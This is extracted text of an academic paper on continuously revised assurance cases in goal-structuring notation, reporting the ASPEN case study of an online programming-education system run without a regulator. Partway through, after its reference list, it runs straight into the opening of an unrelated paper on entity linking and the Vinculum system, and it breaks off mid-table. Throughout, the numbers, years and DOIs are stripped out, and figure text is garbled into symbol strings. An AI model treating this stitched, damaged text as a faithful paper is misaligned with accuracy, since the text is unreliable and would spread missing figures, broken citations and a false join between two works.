cycle from development to service operation. throughout the life cycle, all stakeholders will have participated in arguing for or against the dependability using assurance cases written in goal-structuring notation (gsn) (kelly & weaver, ), a standard notation of assurance cases. unfortunately, service failures occurred during the experiment period, although all the stakeholders made extensive arguments in favor of gsn notations. the occurrence of service failure does not imply the weakness of stakeholders’ cross-validation, because system failure happened in a case of regulator validations. rather, the analysis of the failure case gives us a useful insight: the structured dependability arguments in gsns make it easier to find and share dependability problems across organizations. since transferring dependability problems is a missing part of software life cycle iteration, continuously revised assurance cases can be a new approach to the long-term dependability of ever-changing software. this paper focuses on the report of the aspen case study. the rest of the paper proceeds as follows: ‘what are assurance cases?’ introduces assurance cases and reviews-related work; ‘argumentation architecture’ presents our basic ideas for developing assurance cases for software; ‘experimental setup: aspen project’ describes the aspen project; ‘aspen cases’ examines the assurance cases that were developed in the aspen project; ‘lessons learned and discussions’ discusses lessons learned; and ‘conclusion’ concludes the paper. what are assurance cases? assurance cases are document-based engineering with structured arguments related to safety and dependability (avizienis et al., ). in this paper, we use the term dependability in a broader sense related to safety. the documents of assurance cases are structured to transfer the dependability confidence of products and services to others, such as regulators and third-party organizations. to make the confidence explicit, assurance cases are usually argued in the form of claim-argument-evidence (cae). figure illustrates the conceptual structure of assurance cases with the cae arguments. for example, consider the claim that a system is adequately dependable for operating in a given context. the argument explains the available evidence, showing how it reasonably supports the claim. the top-most claim is decomposed into a series of sub-claims until these can be solved with evidence. since the arguments make the rationale for the claim explicit, they are rigorous, justified, defensible, and transparent. due to the high transparency of dependability arguments, assurance cases generally serve as an efficient risk-communication tool between organizations. however, the most practically used scenario is transferring the developer’s confidence to a regulator or a kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. claim evidence claim of some properties arguments evidence supporting their claims claim claim claim claim evidence evidence figure argument structure of assurance cases. third-party company to assess the conformance of dependability regulations (graydon et al., ). through this assessment mechanism, the regulator forces the developer’s product to meet its regulations, and then the user trusts the developer’s product due to the regulator’s authority. in contrast, the self-assessment of conformance or the absence of dependability regulations makes assurance cases self-righteous and less confident. related work our work builds on many excellent existing ideas for the development of assurance cases in software, including life cycle developments (graydon, knight & strunk, ), argument patterns (weaver, mcdermid & kelly, ; hawkins et al., ), and reviewing arguments (kelly, ; yuan & kelly, ). in particular, graydon, knight & strunk ( ) proposed a closed approach to integrating assurance into the development process by co-developing the software system and its assurance case. hawkins et al. extensively studied the assurance aspect of the software process (hawkins et al., ) and software evolution (hawkins et al., ). a clear, new idea presented in this paper is the use of accountability (by dependability arguments with stakeholder identity), which allows multiple competing stakeholders to share dependability problems across the life cycle stages. in general, assurance information needs to be kept confidential in safety-critical systems (bloomfield, ). however, many experimental research reports have been published for researchers as in an unmanned aircraft (denney, habli & pai, ), automobiles (iso ) (ruiz, melzi & kelly, ), autonomous vehicle and aircraft safety critical software (hawkins et al., ), generic infusion pumps (kim et al., ), pacemakers (jee, lee & sokolsky, ), and health it services (despotou et al., ). in these reported areas, there exists strong regulators who validate the safety of products and services, and the development of reported assurance cases is initially motivated for their regulators. in comparison, our experience report is unique in terms of neither regulators nor safety standards. how assurance cases to be developed for improved software without regulators is an interesting open question for software practitioners (tokoro, ). kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. argumentation architecture this section describes our ideas on how to use assurance cases in software-based it systems with no strong regulator. sharing dependability arguments our initial motivation comes from the risk of miscommunication between stakeholders, such as developers and operators, who separately act in distinct phases of the life cycle. in other words, limitations discussed during software development are quite useful for operators attempting to deliver the correct services, but they are unseen at the time of operation. on the contrary, discussions at the time of operation can provide useful feedback for further development. sharing such discussions, which are focused on dependability, is demanded extensively to improve the long-term dependability of the products and services. our aim in the use of assurance cases is to share dependability arguments among stakeholders throughout the life cycle. as introduced in ‘what are assurance cases?’, the arguments are well structured and more likely to inspire confidence in stakeholders due to the supporting evidence. this would suggest that assurance cases serve as a good foundation for sharing focused knowledge and risk communications. the argumentation architecture needs to change slightly when we attempt to apply it between (a) one stakeholder and another and (b) many stakeholders to many others. first, the top claim must represent a common goal and assumptions that are shared among all stakeholders. we decompose the common claim into sub-claims so that each stakeholder can separately lead his or her active part of the dependability arguments. the top claim is decomposed by stages in the life cycle of products and services. then, we decompose each stage claim by stakeholders if multiple acting stakeholders exist in the same stage. each stakeholder has to provide available evidence that supports dependability claims that are part of the common goal. staging in the lifecycle varies from project to project, but we refer to the following stages in this paper. • planning stage (requirement elicitation and architecting) • development stage (coding and testing) • operation stage (service design and failure recovery) • evolution stage (change accommodation). note that the abovementioned stage decomposition is based on the open system dependability (tokoro, ) that we proposed in the jst/deos project. it is distinct in its evolution stage, when all stakeholders argue for the continuous improvement of services beyond the lifetime of a single system operation. accountability, rebuttals, and revision currently, most software-based it services run under no regulation. as described in ‘what are assurance cases?’, the absence of strong regulators may reduce the practicality of assurance cases. this is a challenge to be avoided in practice. kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. claim evidence developer a claim claim operator c claim developer a claim developer b evidence developer b evidence operator c rebuttal operator c in development in operation agreement figure cross-validation and agreements on conflicts. the first idea to confront this problem is the use of the concept of accountability (haeberlen, kouznetsov & druschel, ); accountability is widely used to build trust and reputation among competing individuals and organizations by exposing failures. in the context of assurance cases, we can integrate the concept of accountability by recording the stakeholder’s identity in every element of assurance cases. that is, the stakeholder’s identity can be used to trace who makes a faulty claim or who gives faulty evidence when a problem occurs. in general, this results in strong incentives to avoid faulty claims and evidence. in addition to stakeholder accountability, we include a form of rebuttal in the dependability arguments. in the context of assurance cases, a rebuttal is a challenge to a claim or an objection to the evidence, usually noted in the review process. rebuttals do not remain during the assessment process because they need to be solved prior to certification. in the case of the absence of a regulator, a rebuttal is not strong enough to enforce modification. unsolved rebuttals are considered conflicts. if the conflicts remain between stakeholders, the claim containing the rebuttal also is regarded in terms of the stakeholder agreements. note that the rebuttals are recorded with the stakeholder’s identity for accountability. based on the recorded rebuttals, we use cross-validation between stakeholders instead of third-party reviewers, since stakeholders in part compete with each other (e.g., a developer wants reduced costs for development, but this makes improperly developed systems a potential risk). a faulty claim often becomes a potential risk for other stakeholders. naturally, non-rebuttal claims are regarded as approved by all stakeholders with some sharable responsibility when a problem occurs. this also leads to other incentives to make rebuttals to others’ claims. figure illustrates our proposed argumentation architecture with life cycle decomposition and stakeholder identities. more importantly, recall that our aim is to facilitate sharing dependability problems between stakeholders, not to facilitate competition among them. the developers and the operators can change software or service operations if they agree on the given rebuttals. in addition, they also are allowed to revise the related assurance cases if their practice kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. !"#$% &#'#()*+ ,-.*(%/* % *+ )* "(%,.#) *% !% # "( :"+ (; -:*< , =>?%/* % @' *(:% (% @'#--+""< figure overview of aspen system. is changed. this results in an iterative process that enables us to better capture the ever-changing nature of software and maintain the dependability of changing software. note that we assume that all revised versions of assurance cases can be maintained by a proper version control system. assurenote, which used in this experiment, has been developed for this purpose. experimental setup: aspen project the aspen project is our organized experiment as a part of the jst/deos project (tokoro, ) to investigate the life cycle maintenance of assurance cases without any regulators. the aspen project includes not only the development of assurance cases across different organizations but also aspen’s software development and service operation with deos industrial partners. this section describes the experimental design in the aspen project. system and service overview aspen is an online education system that provides exercises on programming to students via the web. figure provides the overview of the aspen service. the aspen system are not so unique and consists of multiple servers, including apache web servers, mysql servers, and zabbix monitor servers, which run on linux operating systems. all of the software that constitutes the aspen system are written in scripting languages such as python and javascript. due to the agile feature of these languages, the aspen system is updated often, even after its deployment. aspen is a typical web-based system, not a safety-critical system, which is the system on which assurance cases mainly have been developed so far. however, aspen involves kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure gsn elements. several dependability attributes (avizienis et al., ) that are commonly required in software-based it services: • availability: the service always will be available to the users (i.e., students). • reliability: no hardware or software failures occur during provision of the service. • integrity: programming assignments supplied by the owner do not disappear. • privacy: personal information is not disclosed to unauthorized parties. documentation and tool supports in the aspen project, we use goal structuring notation (kelly & weaver, ) to share assurance cases among stakeholders. gsn is a standard argumentation notation of assurance cases in safety-critical industries. gsn consists of four principal elements, goal (depicted as a rectangle), strategy (parallelogram), evidence (oval), and context (rounded rectangle), as shown in fig. . the goal element is used to state a claim that a system certainly has some desirable properties, such as safety and dependability. the evidence element is some piece of material to support that the linked claim is true. the goal without linked evidence is called undeveloped. as in the cae notation, a goal is decomposed into sub-goals until a point is reached where claims can be supported by direct reference to available evidence. the strategy element is used to state a reason for claim decomposition. the context element is used to state an assumption (the system scope and the assumed properties). there is no special support for stating a rebuttal. we regard the context element linked to the evidence as the rebuttal element. in the experiment, we used assurenote (shida et al., ), a web-based authoring tool that allows multiple users to share a gsn document via the web. figure is a screenshot of assurenote. in assurenote, all gsn elements are automatically recorded with the user identity under the version control of gsn elements. kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure assurenote: a web-based gsn authoring tool. stakeholders another main aim of the aspen project is to examine the effect of assurance cases in the absence of a strong regulator. as described in ‘argumentation architecture’, we need to set up some competing relationship between stakeholders. all stakeholders were selected from different institutes. first, we contracted two different firms separately: one that took charge in software development and the other in service operation. second, we asked an instructor who had adopted the aspen system in her classroom to join the experiment as a stakeholder. the author plays a coordinator role, not a regulator role throughout the whole stage. the stakeholders involved in the aspen project are listed below. • owner: the author • developer: a programmer working for a software development firm • operator: a system engineer with more than years’ experience with web-based service operations • user: an instructor who use the aspen in her classroom. in this paper, we identify stakeholders by role names–owner, developer, operator, and user–for readability. however, on the assurance cases, stakeholders are identified by a personal name for the sake of accountability. kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. development procedure in the experiment, we attempt to develop assurance cases in parallel with the development and service operation of the aspen system. all assurance cases and other communications between stakeholders are written and spoken in japanese. in the planning stage, the owner defines the top claim, which includes dependability goals and assumptions, for which the aspen system is assumed to deliver correct services for the users. following the planning stage, we undertake the aspen system with the following procedures: • the developer claims that the developed system meets the owner’s dependability goals with supporting evidence. • the operator, the user, and the owner review the developer’s claims and agree or disagree. • the operator, based on the developed system, claims that the system operation meets the owner’s dependability goals with supporting evidence. • the developer, the user, and the owner review the operator’s claims and come to agreements on the conflicted claims. • any stakeholder can revise the assurance cases if they contain any insufficiencies or flaws. as shown above, we focus on dependability-related issues and avoid general issues with software implementations and operating procedures. when we handle the disagreement, we ask all stakeholders to meet together at the same place to agree on the conflicts. aspen cases the aspen cases were developed with the method that we proposed in the ‘argumentation architecture’ and ‘experimental setup: aspen project’ sections. this section reports how the arguments are organized with a fragment of gsns and excerpted from the developed assurance cases. overview first, we overview the statistics of the aspen cases. as we described in ‘stakeholders ’, the aspen cases are written in gsn. we first gave the top goal, which was decomposed into the development stage, the service stage, and the evolution stage with common assumptions. the gsns were revised times throughout the aspen project. here we use #n to represent the nth revision. the gsn document grew from four elements (at # ) to elements (at # ). we identify the major revisions as follows: • # initial requirement • # development • # development agreement • # service design kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs.                       planing  #   development   #   development   agreement  #   service  design   #   service   agreement  #   failure   recovery  #   system   evolubon  #   n um be r   of  g sn  e le m en ts #  of  goals   #  of  context   #  of  evidence   #  of  rebuial   figure growth of assurance cases in gsn elements. • # service agreement • # failure recovery • # service evolution. figure shows the growth of the aspen cases in the number of gsn elements: goals, contexts, evidences, and rebuttals. the increase in contexts suggests that the reduced ambiguity of the goals and the increase of evidence reduce the reduced uncertainty in their dependability claims. in the remainder of this section we close up the development agreement (# –# ), the service agreement (# –# ), the failure recovery (# ), and the system evolution (# ). development agreement the developer started the argument with the claim ‘‘aspen is dependable’’ and decomposed it into sub-claims by dependability attributes (cf. aspen is available, integral, safe, etc.). the forms of evidence that the developer provided were mostly other external experience reports (collected from the internet). some goals included a lack of evidence. note that a lack of evidence does not directly imply a lack of dependability, but it does indicate uncertainty about dependability. figure illustrates the fragment with the developer’s claim that the software is integral in data storage. one could consider that evidence e . was not reasonable evidence to support claim g . likewise, the operator pointed out a risk of hardware failure in the disk storage. however, there was not enough time to change the storage system. instead, kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. s . arguing over type of data g data never loses. g submitted program never lose. e . the programs are stored in git c . rebuttal: lack of data backups g student activities never lose. owner operator operator operator developer operator figure example of a rebuttal by the operator’s review. the operator agreed to fault tolerance at the time of operation. in the end, the operator made nine rebuttals to the developer’s claim prior to the operations. service agreement in the operation stage, we focus only on fault mitigation and failure recovery. the operator led the arguments of this part using the fault-avoidance pattern, which consists of the following two parts: • the symptom of a failure (an error) is detectable (by monitoring). • the detected symptom is mitigated before the service stops. the completeness of fault-avoidance analysis is important but not pursued in the experiment, in part because we want to evaluate the iterative updates of assurance cases during the operations. figure is a fragment of assurance cases arguing about the server’s availability. note that some embedded parameters are used for operation scripts (kuramitsu, ). one could consider the given evidence questionable, but the user and the owner trusted the operator’s claim without any doubt due to their limited knowledge. they did not make any rebuttals against the operator, except for some help-desk support in case of service failures. kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. s . arguing over type of errors g symptoms of a failure are detectable. g network overload is detectable. e . zabbix monitor is installed. owner operator owner operator c . assumed users who access at the same time is < operator g cpu overload is detectable. e . zabbix monitor is installed. owner operator c . load average w > is defined as errors operator figure example of arguments on failure avoidance in operation. failure recovery we encountered several service failures while running the aspen system. since unexpected failures imply faulty arguments, the operator or the developer needs to revise the assurance cases. here, we highlight a service failure that occurred in the middle of the classroom. this failure appeared only when students used aspen in the classroom. the system monitor indicated that the server’s operating system was unexpectedly down. at first, the operator suspected that there were unknown bugs in the aspen system. unfortunately, the developer found some bugs that seemed related to the service failure. if there were no assurance cases, they used an incorrect method to recover the service failure. in reviewing assurance cases, the claim ‘‘the servers can scale out’’ was overconfident. the operator never tested the server in any network traffic settings. however, no one pointed out that this claim seemed faulty. after the server problem occurred, the operator recognized that the scale-out setting was incapable of handling simultaneous access by students in the classroom. the instructor strongly requested that the operator should increase the servers as the operator had claimed in the assurance cases. another serious dependability problem was found later in the context of the top goal, which described common assumptions about the aspen system. originally, the aspen system was assumed to allow students to submit their assignments from home computers. based on this assumption, the maximum simultaneous access was estimated to be at most five connections. the number of students in the classroom was fewer than students, but the density of access traffic differed from the estimated patterns. in other kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. words, the top-goal assumption was a sort of bug, which resulting in rechecking all given evidence. system evolution the aspen project ran for two years. in the second year, the aspen system evolved with the following major updates: • the adoption of moodle, an open-source solution to reduce in-house development • a system movement to amazon web services (a standard cloud computing platform). these system updates were not random but derived from several dependability goals and potential risks that were argued in the revised assurance cases. more importantly, all stakeholders, including those who were newly involved in the aspen projects, could share the justification of these system updates in terms of dependability improvements. compared to unstructured e-mail communications, the gsn-formed arguments made it easier to trace dependability problems that actually happened or were expected in the first year. lessons learned and discussions this section describes lessons we learned throughout the aspen case in the form of answering research questions. (question ). do non-experts join dependability arguments with gsns? yes. for all of the participants, the concept of assurance cases was totally new, and they were suspicious of the assurance cases’ benefits. we gave them about a -hour technical lecture on the notation of gsn (not the concept of assurance cases itself.) this short lecture and a web-based gsn viewer were all we prepared for participants to read gsns for dependability arguments. note that organizing dependability arguments is a known difficulty according to bloomfield & bishop ( ). we prepared several simple argument patterns, which are described in ‘experimental setup: aspen project’. due to the argument patterns, arguments grew in a well-structured way. (question ). what was the hardest part in the development of continuously revised assurance cases? collecting acceptable evidence for their dependability claims was difficult and costly. in part because the assurance cases were new for both the developers and the operators, they did not prepare any forms of evidence in their process. for example, the developers performed many software tests as usual, but these test results were far from those requested in the non-functional arguments. neither the developers nor the operators wanted to spend extra resources for evidence, while competing stakeholders always requested much more evidence. perhaps dependability guidelines are necessary to reach agreement on proper forms and levels of evidence. (question ). did stakeholders really validate others’ claims? yes, they were willing to review and tried to validate them. rebuttal serves an enforced communication vehicle between stakeholders. one reason for their many responses was that kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we introduced some penalty (e.g., sharing responsibilities in failure cases) for no-rebuttal claims. this penalty seemed unrealistic but forced all stakeholders to find faulty claims. the activity of cross-validation can be measured by the number of revisions and the growth of gsn elements: • revisions for the development claims • two revisions for the operation claims. the development claims were revised more often than the operation claims. the difference comes mainly from the stakeholders’ expertise. the users were likely to trust the operator’s claims and evidence. (lesson ). is the stakeholder cross-validation strong enough? the answer is that the strength depends on stakeholders’ expertise. the dependability arguments between developers and operators seemingly worked. system failures that occurred in the aspen system were caused by bad operations, not a flaw in the developed software. on the other hand, the users lacked the knowledge of service operations, and they could not point out any weaknesses in the operators’ claims documented in the assurance cases. however, the faulty claims were costly in cases of system failures because the users strongly requested the fulfillment of the operator’s claims as documented. we expected that the gsn documentation became a strong incentive for operators to avoid faulty claims. in reality, the costs of collecting evidence overwhelmed such incentives. (question ). is the development of assurance cases useful in software? the answer is positively yes. our finding in the case analysis of failure recovery suggests that the developed assurance cases make it easier to find dependability problems throughout structured arguments in gsns. even if we are not able to avoid the service failure the first time, the dependability problems can be transferred clearly in the redevelopment phase. since transferring dependability problems across the organization is a missing part in dependability engineering, the contentiously revised assurance cases can bridge the missing part. conclusion recently, assurance cases have received much attention in the field of software-based computer systems and it services. however, software often changes, and there are no strong regulations for software. these facts make the use of software assurance cases more difficult. we proposed a development method for assurance cases with stakeholder cross-validation at every stage of the system life cycle, including in operation and service recovery in a case of system failure. this paper reported our practitioner experience based on the aspen project. as we expected, stakeholders competing with each other were well motivated to find the faulty claims of the others in the gsn documents. this improves the quality of dependability arguments. unfortunately, the stakeholder cross-validation was not able to avoid simple system failures in advance. the case analysis of failure recovery with assurance cases suggests that dependability problems can be easily transferred in a structured way across kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. stakeholders and organizations. since transferring dependability problems is an important missing part of long-term dependability, continuously revised assurance cases may serve as a potential new approach to the long-term improvement of service dependability. in future work, we will investigate the dependability effect of assurance cases from a longer-term perspective. acknowledgements the authors thank to all the deos research members, especially mario tokoro, shuichiro yamamoto, yutaka matsuno, midori sugaya, yoshiki kinoshita, makoto takeyama, and makoto yashiro. additional information and declarations funding this work was supported by the jst/crest grant ‘‘dependable embedded operating systems for practical uses.’’ the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: jst/crest. competing interests the author declares there are no competing interests. author contributions • kimio kuramitsu conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper, funding. data availability the following information was supplied regarding data availability: the raw data has been supplied as a supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references avizienis a, laprie j-c, randell b, landwehr ce. . basic concepts and taxonomy of dependable and secure computing. ieee transactions on dependable and secure computing ( ): – doi . /tdsc. . . kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /tdsc. . http://dx.doi.org/ . /peerj-cs. bloomfield r. . open assurance. security privacy, ieee ( ): – doi . /msp. . . bloomfield re, bishop pg. . safety and assurance cases: past, present and possible future—an adelard perspective. in: making systems safer—proceedings of the eigh- teenth safety-critical systems symposium, bristol, uk, february – , . – doi . / - - - - - . denney e, habli i, pai g. . perspectives on software safety case development for unmanned aircraft. in: proceedings of the nd annual ieee/ifip international conference on dependable systems and networks (dsn ). piscataway: ieee. despotou g, white s, kelly t, ryan m. . introducing safety cases for health it. in: proceedings of the th international workshop on software engineering in health care. piscataway: ieee, – . graydon p, habli i, hawkins r, kelly t, knight j. . arguing conformance. ieee software ( ): – doi . /ms. . . graydon pj, knight jc, strunk e. . assurance based development of critical systems. in: dependable systems and networks, . dsn’ . th annual ieee/ifip international conference on. piscataway: ieee, – . haeberlen a, kouznetsov p, druschel p. . peerreview: practical accountabil- ity for distributed systems. in: proceedings of twenty-first acm sigops sym- posium on operating systems principles, sosp ’ . new york: acm, – doi . / . - - - - . hawkins r, clegg k, alexander r, kelly t. . using a software safety argument pattern catalogue: two case studies. in: proceedings of the th international conference on computer safety, reliability, and security, safecomp’ . berlin: springer-verlag, – . hawkins r, habli i, kelly t, mcdermid j. . assurance cases and prescrip- tive software safety certification: a comparative study. safety science : – doi . /j.ssci. . . . hawkins r, miyazawa a, cavalcanti a, kelly t, rowlands j. . assurance cases for block-configurable software. in: proceedings of the rd international conference on computer safety, reliability, and security—volume , safecomp . new york: springer-verlag new york, inc., – doi . / - - - - - - - - - . jee e, lee i, sokolsky o. . assurance cases in model-driven development of the pacemaker software. in: leveraging applications of formal methods, verification, and validation— th international symposium on leveraging applications, isola , heraklion, crete, greece, october – , , proceedings, part ii. lecture notes in computer science, vol. . berlin heidelberg: springer, – . kelly t. . reviewing assurance arguments-a step-by-step approach. in: workshop on assurance cases for security-the metrics challenge, dependable systems and networks (dsn). available at https://www-users.cs.york.ac.uk/tpk/dsnworkshop .pdf . kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /msp. . http://dx.doi.org/ . / - - - - - http://dx.doi.org/ . /ms. . http://dx.doi.org/ . / . - - - - http://dx.doi.org/ . /j.ssci. . . http://dx.doi.org/ . / - - - - - - - - - https://www-users.cs.york.ac.uk/tpk/dsnworkshop .pdf http://dx.doi.org/ . /peerj-cs. kelly t, weaver r. . the goal structuring notation—a safety argument notation. in: proceedings of the workshop on assurance cases, international conference on dependable systems and networks. available at https://www-users.cs.york.ac.uk/tpk/dsn .pdf . kim b, ayoub a, sokolsky o, lee i, jones p, zhang y, jetley r. . safety-assured development of the gpca infusion pump software. in: proceedings of the ninth acm international conference on embedded software, emsoft ’ . new york: acm, – doi . / . - - - - . kuramitsu k. . d-script: dependable scripting with deos process. in: ieee symposium on software reliability engineering workshops (issrew). piscataway: ieee, – . ruiz a, melzi a, kelly t. . systematic application of iso on a seooc: support by applying a systematic reuse approach. in: proceedings of the design, automation & test in europe conference & exhibition, date ’ . san jose: eda consortium, – . shida s, uchida a, ishii m, ide m, kuramitsu k. . assure-it: a runtime synchro- nization tool of assurance cases. in: safecomp fastabstract. available at https: //hal.archives-ouvertes.fr/hal- / . tokoro m (ed.) . open systems dependability: dependability engineering for ever- changing systems. second edition. boca raton: crc press. weaver r, mcdermid j, kelly t. . software safety arguments: towards a systematic categorisation of evidence. international system safety conference, denver, co. yuan t, kelly t. . argument-based approach to computer system safety engi- neering. international journal of critical computer-based systems ( ): – doi . /ijccbs. . . kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www-users.cs.york.ac.uk/tpk/dsn .pdf http://dx.doi.org/ . / . - - - - https://hal.archives-ouvertes.fr/hal- / https://hal.archives-ouvertes.fr/hal- / http://dx.doi.org/ . /ijccbs. . http://dx.doi.org/ . /peerj-cs. design challenges for entity linking xiao ling sameer singh university of washington, seattle wa {xiaoling,sameer,weld}@cs.washington.edu daniel s. weld abstract recent research on entity linking (el) has in- troduced a plethora of promising techniques, ranging from deep neural networks to joint in- ference. but despite numerous papers there is surprisingly little understanding of the state of the art in el. we attack this confusion by analyzing differences between several versions of the el problem and presenting a simple yet effective, modular, unsupervised system, called vinculum, for entity linking. we con- duct an extensive evaluation on nine data sets, comparing vinculum with two state-of-the- art systems, and elucidate key aspects of the system that include mention extraction, candi- date generation, entity type prediction, entity coreference, and coherence. introduction entity linking (el) is a central task in information extraction — given a textual passage, identify entity mentions (substrings corresponding to world entities) and link them to the corresponding entry in a given knowledge base (kb, e.g. wikipedia or freebase). for example, jetblue begins direct service between barnstable airport and jfk international. here, “jetblue” should be linked to the en- tity kb:jetblue, “barnstable airport” to kb:barnstable municipal airport, and “jfk international” to kb:john f. kennedy international airport . the links not only we use typewriter font, e.g., kb:entity, to indicate an entity in a particular kb, and quotes, e.g., “mention”, to denote textual mentions. provide semantic annotations to human readers but also a machine-consumable representation of the most basic semantic knowledge in the text. many other nlp applications can benefit from such links, such as distantly-supervised relation extraction (craven and kumlien, ; riedel et al., ; hoffmann et al., ; koch et al., ) that uses el to create training data, and some coreference systems that use el for disambiguation (hajishirzi et al., ; zheng et al., ; durrett and klein, ). unfortunately, in spite of numerous papers on the topic and several published data sets, there is surprisingly little understanding about state-of-the-art performance. we argue that there are three reasons for this con- fusion. first, there is no standard definition of the problem. a few variants have been studied in the liter- ature, such as wikification (milne and witten, ; ratinov et al., ; cheng and roth, ) which aims at linking noun phrases to wikipedia entities and named entity linking (aka named entity dis- ambiguation) (mcnamee and dang, ; hoffart et al., ) which targets only named entities. here we use the term entity linking as a unified name for both problems, and named entity linking (nel) for the subproblem of linking only named entities. but names are just one part of the problem. for many variants there are no annotation guidelines for scor- ing links. what types of entities are valid targets? when multiple entities are plausible for annotating a mention, which one should be chosen? are nested mentions allowed? without agreement on these is- sues, a fair comparison is elusive. secondly, it is almost impossible to assess ap- proaches, because systems are rarely compared using the same data sets. for instance, hoffart et al. ( ) transactions of the association for computational linguistics, vol. , pp. – , . action editor: kristina toutanova. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. distributed under a cc-by-nc-sa . license. developed a new data set (aida) based on the conll named entity recognition data set but failed to evaluate their system on msnbc previ- ously created by (cucerzan, ); wikifier (cheng and roth, ) compared to the authors’ previous system (ratinov et al., ) using the originally se- lected datasets but didn’t evaluate using aida data. finally, when two end-to-end systems are com- pared, it is rarely clear which aspect of a system makes one better than the other. this is especially problematic when authors introduce complex mech- anisms or nondeterministic methods that involve learning-based reranking or joint inference. to address these problems, we analyze several sig- nificant inconsistencies among the data sets. to have a better understanding of the importance of various techniques, we develop a simple and modular, un- supervised el system, vinculum. we compare vinculum to the two leading sophisticated el sys- tems on a comprehensive set of nine datasets. while our system does not consistently outperform the best el system, it does come remarkably close and serves as a simple and competitive baseline for future re- search. furthermore, we carry out an extensive ab- lation analysis, whose results illustrate ) even a near-trivial model using crosswikis (spitkovsky and chang, ) performs surprisingly well, and ) in- corporating a fine-grained set of entity types raises that level even higher. in summary, we make the following contributions: • we analyze the differences among several versions of the entity linking problem, compare existing data sets and discuss annotation inconsistencies between them. (sections & ) • we present a simple yet effective, modular, unsu- pervised system, vinculum, for entity linking. we make the implementation open source and pub- licly available for future research. (section ) • we compare vinculum to state-of-the-art sys- tems on an extensive evaluation of data sets. we also investigate several key aspects of the system including mention extraction, candidate genera- tion, entity type prediction, entity coreference, and coherence between entities. (section ) http://github.com/xiaoling/vinculum no standard benchmark in this section, we describe some of the key differ- ences amongst evaluations reported in existing litera- ture, and propose a candidate benchmark for el. . data sets nine data sets are in common use for el evaluation; we partition them into three groups. the uiuc group (ace and msnbc datasets) (ratinov et al., ), aida group (with dev and test sets) (hoffart et al., ), and tac-kbp group (with datasets rang- ing from the through competitions) (mc- namee and dang, ). their statistics are summa- rized in table . our set of nine is not exhaustive, but most other datasets, e.g. csaw (kulkarni et al., ) and aquaint (milne and witten, ), annotate com- mon concepts in addition to named entities. as we argue in sec. . , it is extremely difficult to define an- notation guidelines for common concepts, and there- fore they aren’t suitable for evaluation. for clarity, this paper focuses on linking named entities. sim- ilarly, we exclude datasets comprising tweets and other short-length documents, since radically differ- ent techniques are needed for the specialized corpora. table presents a list of recent el publications showing the data sets that they use for evaluation. the sparsity of this table is striking — apparently no system has reported the performance data from all three of the major evaluation groups. . knowledge base existing benchmarks have also varied considerably in the knowledge base used for link targets. wikipedia has been most commonly used (milne and wit- ten, ; ratinov et al., ; cheng and roth, ), however datasets were annotated using dif- ferent snapshots and subsets. other kbs include yago (hoffart et al., ), freebase (sil and yates, ), dbpedia (mendes et al., ) and a subset of wikipedia (mayfield et al., ). given that al- most all kbs are descendants of wikipedia, we use wikipedia as the base kb in this work. an online appendix containing details of the datasets is avail- able at https://github.com/xiaoling/vinculum/ raw/master/appendix.pdf. since the knowledge bases for all the data sets were around , we use wikipedia dump . http://github.com/xiaoling/vinculum https://github.com/xiaoling/vinculum/raw/master/appendix.pdf https://github.com/xiaoling/vinculum/raw/master/appendix.pdf group data set # of mentions entity types kb # of nils eval. metric uiuc ace any wikipedia topic wikipedia boc f msnbc any wikipedia topic wikipedia boc f aida aida-dev per,org,loc,misc yago accuracy aida-test per,org,loc,misc yago accuracy tac kbp tac pert ,orgt ,gpe tac ⊂ wiki accuracy tac pert ,orgt ,gpe tac ⊂ wiki accuracy tac t pert ,orgt ,gpe tac ⊂ wiki accuracy tac pert ,orgt ,gpe tac ⊂ wiki b + f tac pert ,orgt ,gpe tac ⊂ wiki b + f table : characteristics of the nine nel data sets. entity types: the aida data sets include named entities in four ner classes, person (per), organization (org), location (loc) and misc. in tac kbp data sets, both person (pert ) and organization entities (orgt ) are defined differently from their ner counterparts and geo-political entities (gpe), different from loc, exclude places like kb:central california. kb (sec. . ): the knowledge base used when each data was being developed. evaluation metric (sec. . ): bag-of-concept f is used as the evaluation metric in (ratinov et al., ; cheng and roth, ). b + f used in tac kbp measures the accuracy in terms of entity clusters, grouped by the mentions linked to the same entity. data set ace msnbc aida-test tac tac tac tac aquaint csaw cucerzan ( ) x milne and witten ( ) x kulkarni et al. ( ) x x ratinov et al. ( ) x x x 